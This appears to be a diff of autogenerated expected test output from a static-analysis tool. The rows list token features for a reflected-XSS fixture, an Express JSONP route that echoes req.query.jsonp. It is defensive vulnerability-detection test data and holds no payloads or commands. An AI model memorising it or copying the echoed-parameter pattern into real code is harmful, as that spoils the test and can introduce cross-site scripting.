contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:5:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:5:7 | app.get | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:12:2 | app.get ... se);\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:12:2 | app.get ... se);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:12:2 | app.get ... se);\\n}) | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:12:2 | exceptional return of app.get ... se);\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:12:2 | exceptional return of app.get ... se);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:12:2 | exceptional return of app.get ... se);\\n}) | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:5:5:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:5:5:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:5:5:7 | get | fileImports | express is-var-name | | autogenerated/Xss/ReflectedXss/etherpad.js:5:9:5:20 | "/some/path" | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/etherpad.js:5:9:5:20 | "/some/path" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/etherpad.js:5:9:5:20 | "/some/path" | calleeImports | express | @@ -21350,6 +142415,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/etherpad.js:5:9:5:20 | "/some/path" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/etherpad.js:5:9:5:20 | "/some/path" | fileImports | express is-var-name | | autogenerated/Xss/ReflectedXss/etherpad.js:5:9:5:20 | "/some/path" | receiverName | app | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:5:22 | isVarName | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:5:22 | isVarName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:5:22 | isVarName | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:5:22 | isVarName | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:5:22 | isVarName | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | 'arguments' object of anonymous function | fileImports | express is-var-name | | autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | (req, r ... nse);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | (req, r ... nse);\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | (req, r ... nse);\\n} | calleeImports | express | @@ -21357,6 +142432,225 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | (req, r ... nse);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | (req, r ... nse);\\n} | fileImports | express is-var-name | | autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | (req, r ... nse);\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | exceptional return of anonymous function | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | exceptional return of anonymous function | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | return of anonymous function | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:23:12:1 | return of anonymous function | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:24:5:26 | req | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:29:5:31 | res | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:14 | response | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:14 | response | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:14 | response | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:14 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:14 | response | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | respons ... world!" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | respons ... world!" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | respons ... world!" | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | respons ... world!" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | respons ... world!" | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | response | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | response | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | response | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:7:6:32 | response | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:18:6:32 | "Hello, world!" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:18:6:32 | "Hello, world!" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:18:6:32 | "Hello, world!" | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:18:6:32 | "Hello, world!" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:6:18:6:32 | "Hello, world!" | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:8 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:8 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:8 | req | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:8 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:8 | req | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:14 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:14 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:14 | req.query | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:14 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:14 | req.query | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:20 | req.query.jsonp | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:20 | req.query.jsonp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:20 | req.query.jsonp | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:20 | req.query.jsonp | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:20 | req.query.jsonp | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:50 | req.que ... .jsonp) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:50 | req.que ... .jsonp) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:50 | req.que ... .jsonp) | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:50 | req.que ... .jsonp) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:6:8:50 | req.que ... .jsonp) | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:10:8:14 | query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:10:8:14 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:10:8:14 | query | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:10:8:14 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:10:8:14 | query | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:16:8:20 | jsonp | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:16:8:20 | jsonp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:16:8:20 | jsonp | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:16:8:20 | jsonp | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:16:8:20 | jsonp | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:33 | isVarName | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:33 | isVarName | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:33 | isVarName | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:33 | isVarName | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:33 | isVarName | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | exceptional return of isVarNa ... .jsonp) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | exceptional return of isVarNa ... .jsonp) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | exceptional return of isVarNa ... .jsonp) | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | exceptional return of isVarNa ... .jsonp) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | exceptional return of isVarNa ... .jsonp) | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | isVarNa ... .jsonp) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | isVarNa ... .jsonp) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | isVarNa ... .jsonp) | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | isVarNa ... .jsonp) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:25:8:50 | isVarNa ... .jsonp) | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:37 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:37 | req | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:37 | req | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:43 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:43 | req.query | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:35:8:43 | req.query | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:39:8:43 | query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:39:8:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:39:8:43 | query | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:39:8:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:39:8:43 | query | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:45:8:49 | jsonp | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:45:8:49 | jsonp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:45:8:49 | jsonp | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:45:8:49 | jsonp | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:8:45:8:49 | jsonp | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:12 | response | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:12 | response | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:12 | response | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:12 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:12 | response | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | respons ... e + ")" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | respons ... e + ")" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | respons ... e + ")" | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | respons ... e + ")" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | respons ... e + ")" | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | response | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | response | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | response | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:5:9:53 | response | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:18 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:18 | req | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:18 | req | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:24 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:24 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:24 | req.query | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:24 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:24 | req.query | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:30 | req.query.jsonp | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:30 | req.query.jsonp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:30 | req.query.jsonp | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:30 | req.query.jsonp | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:30 | req.query.jsonp | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:30 | req.query.jsonp | stringConcatenatedWith | -endpoint- '(' + 'Hello, world!' + ')' | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:36 | req.que ... p + "(" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:36 | req.que ... p + "(" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:36 | req.que ... p + "(" | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:36 | req.que ... p + "(" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:36 | req.que ... p + "(" | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:47 | req.que ... esponse | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:47 | req.que ... esponse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:47 | req.que ... esponse | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:47 | req.que ... esponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:47 | req.que ... esponse | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:53 | req.que ... e + ")" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:53 | req.que ... e + ")" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:53 | req.que ... e + ")" | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:53 | req.que ... e + ")" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:16:9:53 | req.que ... e + ")" | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:20:9:24 | query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:20:9:24 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:20:9:24 | query | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:20:9:24 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:20:9:24 | query | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:26:9:30 | jsonp | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:26:9:30 | jsonp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:26:9:30 | jsonp | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:26:9:30 | jsonp | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:26:9:30 | jsonp | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:34:9:36 | "(" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:34:9:36 | "(" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:34:9:36 | "(" | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:34:9:36 | "(" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:34:9:36 | "(" | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:34:9:36 | "(" | stringConcatenatedWith | req.query.jsonp -endpoint- 'Hello, world!' + ')' | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:40:9:47 | response | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:40:9:47 | response | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:40:9:47 | response | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:40:9:47 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:40:9:47 | response | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:40:9:47 | response | stringConcatenatedWith | req.query.jsonp + '(' -endpoint- ')' | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:51:9:53 | ")" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:51:9:53 | ")" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:51:9:53 | ")" | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:51:9:53 | ")" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:51:9:53 | ")" | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:9:51:9:53 | ")" | stringConcatenatedWith | req.query.jsonp + '(' + 'Hello, world!' -endpoint- | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:3 | response | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:3 | response | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:3 | response | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:3 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:3 | response | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:5 | res | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| 